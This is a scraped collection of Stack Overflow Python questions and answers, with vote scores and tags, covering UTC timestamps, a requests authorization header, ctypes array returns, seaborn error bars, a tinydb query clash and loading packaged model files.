Python has naming conventions that are at odds with what you might be used to in Javascript, see PEP 8. Also, a function that simply returns the result of another function is rather silly; if it's just a matter of making it more accessible, you can create another name for a function by simply assigning it. The first example above could be replaced with:
utc_now = datetime.datetime.utcnow
A:
import datetime
import pytz
# datetime object with timezone awareness:
datetime.datetime.now(tz=pytz.utc)
# seconds from epoch:
datetime.datetime.now(tz=pytz.utc).timestamp()
# ms from epoch:
int(datetime.datetime.now(tz=pytz.utc).timestamp() * 1000)
A:
Timezone aware with zero external dependencies:
from datetime import datetime, timezone
def utc_now():
return datetime.utcnow().replace(tzinfo=timezone.utc)
A:
From datetime.datetime you already can export to timestamps with method strftime. Following your function example:
import datetime
def UtcNow():
now = datetime.datetime.utcnow()
return int(now.strftime("%s"))
If you want microseconds, you need to change the export string and cast to float like: return float(now.strftime("%s.%f"))
A:
you could use datetime library to get UTC time even local time.
import datetime
utc_time = datetime.datetime.utcnow()
print(utc_time.strftime('%Y%m%d %H%M%S'))
A:
why all reply based on datetime and not time?
i think is the easy way !
import time
nowgmt = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
print(nowgmt)
| How to get UTC time in Python? | How do I get the UTC time, i.e. milliseconds since Unix epoch on Jan 1, 1970?
| [
"For Python 2 code, use datetime.utcnow():\nfrom datetime import datetime\ndatetime.utcnow()\n\nFor Python 3, use datetime.now(timezone.utc) (the 2.x solution will technically work, but has a giant warning in the 3.x docs):\nfrom datetime import datetime, timezone\ndatetime.now(timezone.utc)\n\nFor your purposes when you need to calculate an amount of time spent between two dates all that you need is to subtract end and start dates. The results of such subtraction is a timedelta object.\nFrom the python docs:\nclass datetime.timedelta([days[, seconds[, microseconds[, milliseconds[, minutes[, hours[, weeks]]]]]]])\n\nAnd this means that by default you can get any of the fields mentioned in it's definition -\ndays, seconds, microseconds, milliseconds, minutes, hours, weeks. Also timedelta instance has total_seconds() method that:\n\nReturn the total number of seconds contained in the duration.\nEquivalent to (td.microseconds + (td.seconds + td.days * 24 * 3600) *\n106) / 106 computed with true division enabled.\n\n",
"Timezone-aware datetime object, unlike datetime.utcnow():\nfrom datetime import datetime,timezone\nnow_utc = datetime.now(timezone.utc)\n\n\nTimestamp in milliseconds since Unix epoch:\ndatetime.now(timezone.utc).timestamp() * 1000\n\n",
"In the form closest to your original:\nimport datetime\n\ndef UtcNow():\n now = datetime.datetime.utcnow()\n return now\n\nIf you need to know the number of seconds from 1970-01-01 rather than a native Python datetime, use this instead:\nreturn (now - datetime.datetime(1970, 1, 1)).total_seconds()\n\nPython has naming conventions that are at odds with what you might be used to in Javascript, see PEP 8. Also, a function that simply returns the result of another function is rather silly; if it's just a matter of making it more accessible, you can create another name for a function by simply assigning it. The first example above could be replaced with:\nutc_now = datetime.datetime.utcnow\n\n",
"import datetime\nimport pytz\n\n# datetime object with timezone awareness:\ndatetime.datetime.now(tz=pytz.utc)\n\n# seconds from epoch:\ndatetime.datetime.now(tz=pytz.utc).timestamp() \n\n# ms from epoch:\nint(datetime.datetime.now(tz=pytz.utc).timestamp() * 1000) \n\n",
"Timezone aware with zero external dependencies:\nfrom datetime import datetime, timezone\n\ndef utc_now():\n return datetime.utcnow().replace(tzinfo=timezone.utc)\n\n",
"From datetime.datetime you already can export to timestamps with method strftime. Following your function example:\nimport datetime\ndef UtcNow():\n now = datetime.datetime.utcnow()\n return int(now.strftime(\"%s\"))\n\nIf you want microseconds, you need to change the export string and cast to float like: return float(now.strftime(\"%s.%f\")) \n",
"you could use datetime library to get UTC time even local time.\nimport datetime\n\nutc_time = datetime.datetime.utcnow() \nprint(utc_time.strftime('%Y%m%d %H%M%S'))\n\n",
"why all reply based on datetime and not time?\ni think is the easy way !\nimport time\nnowgmt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(nowgmt)\n\n"
] | [
279,
169,
47,
22,
15,
10,
6,
4
] | [
"To be correct, UTC format needs at least the T letter:\n>>> a=(datetime.datetime.now(timezone.utc))\n>>> a.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n'2022-11-28T16:42:17Z'\n\n"
] | [
-2
] | [
"datetime",
"python"
] | stackoverflow_0015940280_datetime_python.txt |
Q:
Pyhton requests library passing Authorization header with single token, still getting 403
Code-
HEADER= {
'Authorization': f'Token {TOKEN}'
}
resp= requests.request(
"GET",
url,
headers=HEADER
)
Error message-
{'detail': 'Authentication credentials were not provided.'}
resp.request.headers output
{'User-Agent': 'python-requests/2.28.1', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'application/json', 'Connection': 'keep-alive'}
I have tried passing HEADER dict directly in request function (with/without fstring)
directly used .get
Basically tried everything mentioned here Python requests library how to pass Authorization header with single token
nothing worked...any idea what might be wrong
TOKEN is correct
A:
'Authentication credentials were not provided.' should be 401, and, 403 means you don't have the permission, maybe you should talk to the api provider.
| Pyhton requests library passing Authorization header with single token, still getting 403 | Code-
HEADER= {
'Authorization': f'Token {TOKEN}'
}
resp= requests.request(
"GET",
url,
headers=HEADER
)
Error message-
{'detail': 'Authentication credentials were not provided.'}
resp.request.headers output
{'User-Agent': 'python-requests/2.28.1', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'application/json', 'Connection': 'keep-alive'}
I have tried passing HEADER dict directly in request function (with/without fstring)
directly used .get
Basically tried everything mentioned here Python requests library how to pass Authorization header with single token
nothing worked...any idea what might be wrong
TOKEN is correct
| [
"'Authentication credentials were not provided.' should be 401, and, 403 means you don't have the permission, maybe you should talk to the api provider.\n"
] | [
0
] | [] | [] | [
"api",
"python",
"python_requests"
] | stackoverflow_0074603592_api_python_python_requests.txt |
Q:
Reading array returned by c function in ctypes
I've got some C code, which I'm trying to access from ctypes in python. A particular function looks something like this:
float *foo(void) {
static float bar[2];
// Populate bar
return bar;
}
I know this isn't an ideal way to write C, but it does the job in this case. I'm struggling to write the python to get the two floats contained in the response. I'm fine with return values that are single variables, but I can't work out from the ctypes docs how to handle a pointer to an array.
Any ideas?
A:
Specify restypes as [POINTER][1](c_float):
import ctypes
libfoo = ctypes.cdll.LoadLibrary('./foo.so')
foo = libfoo.foo
foo.argtypes = ()
foo.restype = ctypes.POINTER(ctypes.c_float)
result = foo()
print(result[0], result[1])
A:
Thanks to @falsetru, believe I found a somehow better solution, which takes into account the fact that the C function returns a pointer to two floats:
import ctypes
libfoo = ctypes.cdll.LoadLibrary('./foo.so')
foo = libfoo.foo
foo.argtypes = ()
foo.restype = ctypes.POINTER(ctypes.c_float * 2)
result = foo().contents
print('length of the returned list: ' + len(result))
print(result[0], result[1])
| Reading array returned by c function in ctypes | I've got some C code, which I'm trying to access from ctypes in python. A particular function looks something like this:
float *foo(void) {
static float bar[2];
// Populate bar
return bar;
}
I know this isn't an ideal way to write C, but it does the job in this case. I'm struggling to write the python to get the two floats contained in the response. I'm fine with return values that are single variables, but I can't work out from the ctypes docs how to handle a pointer to an array.
Any ideas?
| [
"Specify restypes as [POINTER][1](c_float):\nimport ctypes\n\nlibfoo = ctypes.cdll.LoadLibrary('./foo.so')\nfoo = libfoo.foo\nfoo.argtypes = ()\nfoo.restype = ctypes.POINTER(ctypes.c_float)\nresult = foo()\nprint(result[0], result[1])\n\n",
"Thanks to @falsetru, believe I found a somehow better solution, which takes into account the fact that the C function returns a pointer to two floats:\nimport ctypes\n\nlibfoo = ctypes.cdll.LoadLibrary('./foo.so')\nfoo = libfoo.foo\nfoo.argtypes = ()\nfoo.restype = ctypes.POINTER(ctypes.c_float * 2)\nresult = foo().contents\n\nprint('length of the returned list: ' + len(result))\nprint(result[0], result[1])\n\n"
] | [
11,
0
] | [] | [] | [
"c",
"ctypes",
"python"
] | stackoverflow_0018044468_c_ctypes_python.txt |
Q:
Shift error bars in seaborn barplot with two categories?
I am trying to plot some error bars on tope of a seaborn bar plot made with catplot as below. DF output from .to_clipboard(sep=',', index=True).
Melted DF:
,Parameter,Output,Sobol index,Value
0,$μ_{max}$,P,Total-effect,0.956747485
1,$μ_{max}$,D,Total-effect,-3.08778755e-08
2,$μ_{max}$,I,Total-effect,0.18009523
3,$μ_{max}$,N,Total-effect,0.234568344
4,$μ_{max}$,Mean,Total-effect,0.3428527570305311
5,$m$,P,Total-effect,0.159805431
6,$m$,D,Total-effect,1.13115268
7,$m$,I,Total-effect,0.256635185
8,$m$,N,Total-effect,0.00556940644
9,$m$,Mean,Total-effect,0.38829067561
10,$\alpha_D$,P,Total-effect,0.00115455519
11,$\alpha_D$,D,Total-effect,-0.000953479004
12,$\alpha_D$,I,Total-effect,0.157263821
13,$\alpha_D$,N,Total-effect,0.197434829
14,$\alpha_D$,Mean,Total-effect,0.08872493154649999
15,$N_{max}$,P,Total-effect,0.112155751
16,$N_{max}$,D,Total-effect,0.795253131
17,$N_{max}$,I,Total-effect,0.380872014
18,$N_{max}$,N,Total-effect,0.384059029
19,$N_{max}$,Mean,Total-effect,0.41808498124999993
20,$\gamma_{cell}$,P,Total-effect,0.237220261
21,$\gamma_{cell}$,D,Total-effect,-0.00380320853
22,$\gamma_{cell}$,I,Total-effect,0.00371553068
23,$\gamma_{cell}$,N,Total-effect,0.0010752371
24,$\gamma_{cell}$,Mean,Total-effect,0.059551955062499995
25,$K_d$,P,Total-effect,0.062129271
26,$K_d$,D,Total-effect,-1.46430838e-12
27,$K_d$,I,Total-effect,0.94771372
28,$K_d$,N,Total-effect,0.985790701
29,$K_d$,Mean,Total-effect,0.4989084229996339
30,$μ_{max}$,P,First-order,0.655145193
31,$μ_{max}$,D,First-order,-6.84274992e-20
32,$μ_{max}$,I,First-order,0.00537009868
33,$μ_{max}$,N,First-order,0.000186118183
34,$μ_{max}$,Mean,First-order,0.16517535246575
35,$m$,P,First-order,0.000688037316
36,$m$,D,First-order,0.379773978
37,$m$,I,First-order,0.0065270132
38,$m$,N,First-order,0.00471697043
39,$m$,Mean,First-order,0.0979264997365
40,$\alpha_D$,P,First-order,5.88800317e-07
41,$\alpha_D$,D,First-order,3.59595179e-21
42,$\alpha_D$,I,First-order,0.00405428355
43,$\alpha_D$,N,First-order,4.23811678e-05
44,$\alpha_D$,Mean,First-order,0.00102431337952925
45,$N_{max}$,P,First-order,0.00369586495
46,$N_{max}$,D,First-order,1.71266774e-09
47,$N_{max}$,I,First-order,0.0150083874
48,$N_{max}$,N,First-order,0.00143697969
49,$N_{max}$,Mean,First-order,0.005035308438166935
50,$\gamma_{cell}$,P,First-order,0.0116538163
51,$\gamma_{cell}$,D,First-order,-8.51017704e-24
52,$\gamma_{cell}$,I,First-order,0.00180446631
53,$\gamma_{cell}$,N,First-order,-1.1891221e-07
54,$\gamma_{cell}$,Mean,First-order,0.0033645409244475
55,$K_d$,P,First-order,0.000593392401
56,$K_d$,D,First-order,1.24032496e-17
57,$K_d$,I,First-order,0.314711173
58,$K_d$,N,First-order,0.393636611
59,$K_d$,Mean,First-order,0.17723529410025002
Err DF:
,Parameter,Output,Error,value
0,$μ_{max}$,P,Total Error,0.00532374344
1,$μ_{max}$,D,Total Error,3.27057237e-08
2,$μ_{max}$,I,Total Error,0.00589710262
3,$μ_{max}$,N,Total Error,0.0114684117
4,$μ_{max}$,Mean,Total Error,0.005672322616430925
5,$m$,P,Total Error,0.00043759689
6,$m$,D,Total Error,0.20494168
7,$m$,I,Total Error,0.00562181392
8,$m$,N,Total Error,0.00280516814
9,$m$,Mean,Total Error,0.0534515647375
10,$\alpha_D$,P,Total Error,0.0005054549
11,$\alpha_D$,D,Total Error,0.00103547316
12,$\alpha_D$,I,Total Error,0.00461107762
13,$\alpha_D$,N,Total Error,0.0048878586
14,$\alpha_D$,Mean,Total Error,0.00275996607
15,$N_{max}$,P,Total Error,0.00278612157
16,$N_{max}$,D,Total Error,0.228255264
17,$N_{max}$,I,Total Error,0.0122461237
18,$N_{max}$,N,Total Error,0.00975799636
19,$N_{max}$,Mean,Total Error,0.0632613764075
20,$\gamma_{cell}$,P,Total Error,0.00183489881
21,$\gamma_{cell}$,D,Total Error,0.00380320865
22,$\gamma_{cell}$,I,Total Error,0.000257448243
23,$\gamma_{cell}$,N,Total Error,0.0014860645
24,$\gamma_{cell}$,Mean,Total Error,0.00184540505075
25,$K_d$,P,Total Error,0.00198581744
26,$K_d$,D,Total Error,4.60436562e-12
27,$K_d$,I,Total Error,0.0061495373
28,$K_d$,N,Total Error,0.0104738223
29,$K_d$,Mean,Total Error,0.004652294261151092
30,$μ_{max}$,P,First Error,0.00251411484
31,$μ_{max}$,D,First Error,5.81033819e-20
32,$μ_{max}$,I,First Error,0.000157513959
33,$μ_{max}$,N,First Error,0.000242607282
34,$μ_{max}$,Mean,First Error,0.00072855902025
35,$m$,P,First Error,0.000102871751
36,$m$,D,First Error,0.114462613
37,$m$,I,First Error,0.000544114122
38,$m$,N,First Error,0.00208775169
39,$m$,Mean,First Error,0.029299337640750003
40,$\alpha_D$,P,First Error,2.85055333e-06
41,$\alpha_D$,D,First Error,2.97531464e-21
42,$\alpha_D$,I,First Error,0.000382494131
43,$\alpha_D$,N,First Error,6.18549533e-05
44,$\alpha_D$,Mean,First Error,0.00011179990940750001
45,$N_{max}$,P,First Error,0.000359843541
46,$N_{max}$,D,First Error,1.71266774e-09
47,$N_{max}$,I,First Error,0.00147221438
48,$N_{max}$,N,First Error,0.000931579111
49,$N_{max}$,Mean,First Error,0.000690909686166935
50,$\gamma_{cell}$,P,First Error,0.000245701873
51,$\gamma_{cell}$,D,First Error,9.57051247e-24
52,$\gamma_{cell}$,I,First Error,0.000318847918
53,$\gamma_{cell}$,N,First Error,1.1718385e-07
54,$\gamma_{cell}$,Mean,First Error,0.0001411667437125
55,$K_d$,P,First Error,0.000284942556
56,$K_d$,D,First Error,2.3820604e-18
57,$K_d$,I,First Error,0.00320241658
58,$K_d$,N,First Error,0.00880561072
59,$K_d$,Mean,First Error,0.0030732424640000006
Code:
# Get dataframes
df = analysis.sensitivity_analysis_result.get_dataframe(analysis.scenario)
err_df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total Error", "First Error"], var_name="Error")
df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total-effect", "First-order"], var_name="Sobol index", value_name="Value")
# Plot
grid = sns.catplot(data=df, x="Parameter", y="Value", col="Output", col_wrap=2, hue="Sobol index", kind="bar", aspect=1.8, legend_out=False)
# Add error lines and values
for ax, var in zip(grid.axes.ravel(), ["P", "D", "I", "N"]):
# Error bars
ax.errorbar(x=df[df["Output"] == var]["Parameter"], y=df[df["Output"] == var]["Value"],
yerr=err_df[err_df["Output"] == var]["value"], ecolor='black', linewidth=0, capsize=2)
# Value labels
for c in ax.containers:
if type(c) == matplotlib.container.BarContainer:
ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else "<0.01" for v in c], label_type='edge')
grid.tight_layout()
The issue I'm facing is that the error bar cap sizes are not centered with the actual bar. Here's the output I get. How can I fix this? The x parameter I pass to error bar is not a float but rather a column from a data frame so it is not obvious to me how to shift it.
A:
You plot categorical values (the x values are strings), the x positions of the (center of the) bar groups and the error bars the way you plotted them are range(n) where n is the number of parameters. These x positions can also be retrieved by ax.xaxis.get_majorticklocs().
To put the error bars in the middle of the bar you need to consider the offset of each bar relative to the center of the bar group. This offset depends on the bar width (default is 0.8) and the number of bars per group. For a generic solution you'll to differentiate between odd and even numbers of bars per group.
The following shows the case for 2 hues or bars per group (df['Sobol index'].nunique() == 2):
# Plot
width = 0.8
grid = sns.catplot(data=df, x="Parameter", y="Value", col="Output", col_wrap=2, hue="Sobol index", kind="bar", aspect=1.8, legend_out=False, width=width)
# Add error lines and values
for ax, var in zip(grid.axes.ravel(), ["P", "D", "I", "N"]):
# Error bars
ticklocs = ax.xaxis.get_majorticklocs()
offset = 0.5 * width / 2 # 2 = number of hues or bars per group
ax.errorbar(x=np.append(ticklocs - offset, ticklocs + offset), y=df[df["Output"] == var]["Value"],
yerr=err_df[err_df["Output"] == var]["value"], ecolor='black', linewidth=0, capsize=2, elinewidth=1)
# Value labels
for c in ax.containers:
if type(c) == matplotlib.container.BarContainer:
ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else "<0.01" for v in c], label_type='edge')
grid.tight_layout()
| Shift error bars in seaborn barplot with two categories? | I am trying to plot some error bars on tope of a seaborn bar plot made with catplot as below. DF output from .to_clipboard(sep=',', index=True).
Melted DF:
,Parameter,Output,Sobol index,Value
0,$μ_{max}$,P,Total-effect,0.956747485
1,$μ_{max}$,D,Total-effect,-3.08778755e-08
2,$μ_{max}$,I,Total-effect,0.18009523
3,$μ_{max}$,N,Total-effect,0.234568344
4,$μ_{max}$,Mean,Total-effect,0.3428527570305311
5,$m$,P,Total-effect,0.159805431
6,$m$,D,Total-effect,1.13115268
7,$m$,I,Total-effect,0.256635185
8,$m$,N,Total-effect,0.00556940644
9,$m$,Mean,Total-effect,0.38829067561
10,$\alpha_D$,P,Total-effect,0.00115455519
11,$\alpha_D$,D,Total-effect,-0.000953479004
12,$\alpha_D$,I,Total-effect,0.157263821
13,$\alpha_D$,N,Total-effect,0.197434829
14,$\alpha_D$,Mean,Total-effect,0.08872493154649999
15,$N_{max}$,P,Total-effect,0.112155751
16,$N_{max}$,D,Total-effect,0.795253131
17,$N_{max}$,I,Total-effect,0.380872014
18,$N_{max}$,N,Total-effect,0.384059029
19,$N_{max}$,Mean,Total-effect,0.41808498124999993
20,$\gamma_{cell}$,P,Total-effect,0.237220261
21,$\gamma_{cell}$,D,Total-effect,-0.00380320853
22,$\gamma_{cell}$,I,Total-effect,0.00371553068
23,$\gamma_{cell}$,N,Total-effect,0.0010752371
24,$\gamma_{cell}$,Mean,Total-effect,0.059551955062499995
25,$K_d$,P,Total-effect,0.062129271
26,$K_d$,D,Total-effect,-1.46430838e-12
27,$K_d$,I,Total-effect,0.94771372
28,$K_d$,N,Total-effect,0.985790701
29,$K_d$,Mean,Total-effect,0.4989084229996339
30,$μ_{max}$,P,First-order,0.655145193
31,$μ_{max}$,D,First-order,-6.84274992e-20
32,$μ_{max}$,I,First-order,0.00537009868
33,$μ_{max}$,N,First-order,0.000186118183
34,$μ_{max}$,Mean,First-order,0.16517535246575
35,$m$,P,First-order,0.000688037316
36,$m$,D,First-order,0.379773978
37,$m$,I,First-order,0.0065270132
38,$m$,N,First-order,0.00471697043
39,$m$,Mean,First-order,0.0979264997365
40,$\alpha_D$,P,First-order,5.88800317e-07
41,$\alpha_D$,D,First-order,3.59595179e-21
42,$\alpha_D$,I,First-order,0.00405428355
43,$\alpha_D$,N,First-order,4.23811678e-05
44,$\alpha_D$,Mean,First-order,0.00102431337952925
45,$N_{max}$,P,First-order,0.00369586495
46,$N_{max}$,D,First-order,1.71266774e-09
47,$N_{max}$,I,First-order,0.0150083874
48,$N_{max}$,N,First-order,0.00143697969
49,$N_{max}$,Mean,First-order,0.005035308438166935
50,$\gamma_{cell}$,P,First-order,0.0116538163
51,$\gamma_{cell}$,D,First-order,-8.51017704e-24
52,$\gamma_{cell}$,I,First-order,0.00180446631
53,$\gamma_{cell}$,N,First-order,-1.1891221e-07
54,$\gamma_{cell}$,Mean,First-order,0.0033645409244475
55,$K_d$,P,First-order,0.000593392401
56,$K_d$,D,First-order,1.24032496e-17
57,$K_d$,I,First-order,0.314711173
58,$K_d$,N,First-order,0.393636611
59,$K_d$,Mean,First-order,0.17723529410025002
Err DF:
,Parameter,Output,Error,value
0,$μ_{max}$,P,Total Error,0.00532374344
1,$μ_{max}$,D,Total Error,3.27057237e-08
2,$μ_{max}$,I,Total Error,0.00589710262
3,$μ_{max}$,N,Total Error,0.0114684117
4,$μ_{max}$,Mean,Total Error,0.005672322616430925
5,$m$,P,Total Error,0.00043759689
6,$m$,D,Total Error,0.20494168
7,$m$,I,Total Error,0.00562181392
8,$m$,N,Total Error,0.00280516814
9,$m$,Mean,Total Error,0.0534515647375
10,$\alpha_D$,P,Total Error,0.0005054549
11,$\alpha_D$,D,Total Error,0.00103547316
12,$\alpha_D$,I,Total Error,0.00461107762
13,$\alpha_D$,N,Total Error,0.0048878586
14,$\alpha_D$,Mean,Total Error,0.00275996607
15,$N_{max}$,P,Total Error,0.00278612157
16,$N_{max}$,D,Total Error,0.228255264
17,$N_{max}$,I,Total Error,0.0122461237
18,$N_{max}$,N,Total Error,0.00975799636
19,$N_{max}$,Mean,Total Error,0.0632613764075
20,$\gamma_{cell}$,P,Total Error,0.00183489881
21,$\gamma_{cell}$,D,Total Error,0.00380320865
22,$\gamma_{cell}$,I,Total Error,0.000257448243
23,$\gamma_{cell}$,N,Total Error,0.0014860645
24,$\gamma_{cell}$,Mean,Total Error,0.00184540505075
25,$K_d$,P,Total Error,0.00198581744
26,$K_d$,D,Total Error,4.60436562e-12
27,$K_d$,I,Total Error,0.0061495373
28,$K_d$,N,Total Error,0.0104738223
29,$K_d$,Mean,Total Error,0.004652294261151092
30,$μ_{max}$,P,First Error,0.00251411484
31,$μ_{max}$,D,First Error,5.81033819e-20
32,$μ_{max}$,I,First Error,0.000157513959
33,$μ_{max}$,N,First Error,0.000242607282
34,$μ_{max}$,Mean,First Error,0.00072855902025
35,$m$,P,First Error,0.000102871751
36,$m$,D,First Error,0.114462613
37,$m$,I,First Error,0.000544114122
38,$m$,N,First Error,0.00208775169
39,$m$,Mean,First Error,0.029299337640750003
40,$\alpha_D$,P,First Error,2.85055333e-06
41,$\alpha_D$,D,First Error,2.97531464e-21
42,$\alpha_D$,I,First Error,0.000382494131
43,$\alpha_D$,N,First Error,6.18549533e-05
44,$\alpha_D$,Mean,First Error,0.00011179990940750001
45,$N_{max}$,P,First Error,0.000359843541
46,$N_{max}$,D,First Error,1.71266774e-09
47,$N_{max}$,I,First Error,0.00147221438
48,$N_{max}$,N,First Error,0.000931579111
49,$N_{max}$,Mean,First Error,0.000690909686166935
50,$\gamma_{cell}$,P,First Error,0.000245701873
51,$\gamma_{cell}$,D,First Error,9.57051247e-24
52,$\gamma_{cell}$,I,First Error,0.000318847918
53,$\gamma_{cell}$,N,First Error,1.1718385e-07
54,$\gamma_{cell}$,Mean,First Error,0.0001411667437125
55,$K_d$,P,First Error,0.000284942556
56,$K_d$,D,First Error,2.3820604e-18
57,$K_d$,I,First Error,0.00320241658
58,$K_d$,N,First Error,0.00880561072
59,$K_d$,Mean,First Error,0.0030732424640000006
Code:
# Get dataframes
df = analysis.sensitivity_analysis_result.get_dataframe(analysis.scenario)
err_df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total Error", "First Error"], var_name="Error")
df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total-effect", "First-order"], var_name="Sobol index", value_name="Value")
# Plot
grid = sns.catplot(data=df, x="Parameter", y="Value", col="Output", col_wrap=2, hue="Sobol index", kind="bar", aspect=1.8, legend_out=False)
# Add error lines and values
for ax, var in zip(grid.axes.ravel(), ["P", "D", "I", "N"]):
# Error bars
ax.errorbar(x=df[df["Output"] == var]["Parameter"], y=df[df["Output"] == var]["Value"],
yerr=err_df[err_df["Output"] == var]["value"], ecolor='black', linewidth=0, capsize=2)
# Value labels
for c in ax.containers:
if type(c) == matplotlib.container.BarContainer:
ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else "<0.01" for v in c], label_type='edge')
grid.tight_layout()
The issue I'm facing is that the error bar cap sizes are not centered with the actual bar. Here's the output I get. How can I fix this? The x parameter I pass to error bar is not a float but rather a column from a data frame so it is not obvious to me how to shift it.
| [
"You plot categorical values (the x values are strings), the x positions of the (center of the) bar groups and the error bars the way you plotted them are range(n) where n is the number of parameters. These x positions can also be retrieved by ax.xaxis.get_majorticklocs().\nTo put the error bars in the middle of the bar you need to consider the offset of each bar relative to the center of the bar group. This offset depends on the bar width (default is 0.8) and the number of bars per group. For a generic solution you'll to differentiate between odd and even numbers of bars per group.\nThe following shows the case for 2 hues or bars per group (df['Sobol index'].nunique() == 2):\n# Plot\nwidth = 0.8\ngrid = sns.catplot(data=df, x=\"Parameter\", y=\"Value\", col=\"Output\", col_wrap=2, hue=\"Sobol index\", kind=\"bar\", aspect=1.8, legend_out=False, width=width)\n\n# Add error lines and values\nfor ax, var in zip(grid.axes.ravel(), [\"P\", \"D\", \"I\", \"N\"]):\n # Error bars\n ticklocs = ax.xaxis.get_majorticklocs()\n offset = 0.5 * width / 2 # 2 = number of hues or bars per group\n ax.errorbar(x=np.append(ticklocs - offset, ticklocs + offset), y=df[df[\"Output\"] == var][\"Value\"],\n yerr=err_df[err_df[\"Output\"] == var][\"value\"], ecolor='black', linewidth=0, capsize=2, elinewidth=1)\n\n # Value labels \n for c in ax.containers:\n if type(c) == matplotlib.container.BarContainer:\n ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else \"<0.01\" for v in c], label_type='edge')\n\ngrid.tight_layout()\n\n\n"
] | [
2
] | [] | [] | [
"bar_chart",
"matplotlib",
"python",
"seaborn"
] | stackoverflow_0074540942_bar_chart_matplotlib_python_seaborn.txt |
Q:
TypeError: 'bool' object is not callable in python module tinydb
I have error TypeError: 'bool' object is not callable, when try to use function search in tinydb
My code:
from tinydb import TinyDB, Query
db = TinyDB('db.json')
User = Query()
db.insert({'test': 'signs', 'age': 34})
res = db.search(User.test == 'signs')
print(res)
`
A:
It appears that "test" is a built-in function for a Query object.
Changing test to name or anything else will fix issue.
from tinydb import TinyDB, Query
db = TinyDB('db.json')
User = Query()
db.insert({'name': 'signs', 'age': 34})
res = db.search(User.name == "signs")
print(f"the search: {res}")
print(f"User.test: {User.test}")
Output
the search: [{'name': 'signs', 'age': 34}]
User.test: <bound method Query.test of Query()>
You can also see 'test' listed as an attribute of a Query object buy running dir() on the object you create
>>> from tinydb import TinyDB, Query
>>> User = Query()
>>> dir(User)
['__and__', '__call__', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattr__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__invert__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__or__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_generate_test', '_hash', '_path', '_test', 'all', 'any', 'exists', 'fragment', 'is_cacheable', 'map', 'matches', 'noop', 'one_of', 'search', 'test']
| TypeError: 'bool' object is not callable in python module tinydb | I have error TypeError: 'bool' object is not callable, when try to use function search in tinydb
My code:
from tinydb import TinyDB, Query
db = TinyDB('db.json')
User = Query()
db.insert({'test': 'signs', 'age': 34})
res = db.search(User.test == 'signs')
print(res)
`
| [
"It appears that \"test\" is a built-in function for a Query object.\nChanging test to name or anything else will fix issue.\nfrom tinydb import TinyDB, Query\ndb = TinyDB('db.json')\nUser = Query()\ndb.insert({'name': 'signs', 'age': 34})\nres = db.search(User.name == \"signs\")\nprint(f\"the search: {res}\")\nprint(f\"User.test: {User.test}\")\n\nOutput\nthe search: [{'name': 'signs', 'age': 34}]\nUser.test: <bound method Query.test of Query()>\n\nYou can also see 'test' listed as an attribute of a Query object buy running dir() on the object you create\n>>> from tinydb import TinyDB, Query\n>>> User = Query()\n>>> dir(User)\n['__and__', '__call__', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattr__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__invert__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__or__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_generate_test', '_hash', '_path', '_test', 'all', 'any', 'exists', 'fragment', 'is_cacheable', 'map', 'matches', 'noop', 'one_of', 'search', 'test']\n\n"
] | [
0
] | [] | [] | [
"database",
"python"
] | stackoverflow_0074603001_database_python.txt |
Q:
my own python package - problem with path to model
I published python package on pypi.org structure looks like this:
/my_package_name-0.0.1
-- README LICENSE ETC..
-- /my_package_name
-- __init__.py
-- train_model.py
-- predict.py
-- /saved_models
-- november_model
In predict.py I have function that loads model:
def my_function():
(some code...)
net.load_model('./saved_models/november_model')
When I'm trying to use the package:
from my_package.predict import my_function
my_function()
I get error that it can't see the model:
OSError: Unable to open file
(unable to open file: name = './saved_models/november_model',
errno = 2, error message = 'No such file or directory', flags = 0, o_flags = 0)
I tried also:
net.load_model('saved_models/november_model')
net.load_model('./saved_models/november_model')
net.load_model('../saved_models/november_model')
I can't figure out correct path
A:
The solution was to use importlib.resources in predict.py:
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 `importlib_resources`.
import importlib_resources as pkg_resources
from my_package import saved_models
and instead of:
net.load_model('saved_models/november_model')
I used:
f = pkg_resources.open_text(saved_models, 'november_model')
net.load_model(f.name)
| my own python package - problem with path to model | I published python package on pypi.org structure looks like this:
/my_package_name-0.0.1
-- README LICENSE ETC..
-- /my_package_name
-- __init__.py
-- train_model.py
-- predict.py
-- /saved_models
-- november_model
In predict.py I have function that loads model:
def my_function():
(some code...)
net.load_model('./saved_models/november_model')
When I'm trying to use the package:
from my_package.predict import my_function
my_function()
I get error that it can't see the model:
OSError: Unable to open file
(unable to open file: name = './saved_models/november_model',
errno = 2, error message = 'No such file or directory', flags = 0, o_flags = 0)
I tried also:
net.load_model('saved_models/november_model')
net.load_model('./saved_models/november_model')
net.load_model('../saved_models/november_model')
I can't figure out correct path
| [
"The solution was to use importlib.resources in predict.py:\ntry:\n import importlib.resources as pkg_resources\nexcept ImportError:\n # Try backported to PY<37 `importlib_resources`.\n import importlib_resources as pkg_resources\nfrom my_package import saved_models\n\nand instead of:\nnet.load_model('saved_models/november_model')\n\nI used:\nf = pkg_resources.open_text(saved_models, 'november_model')\nnet.load_model(f.name)\n\n"
] | [
1
] | [] | [] | [
"pypi",
"python"
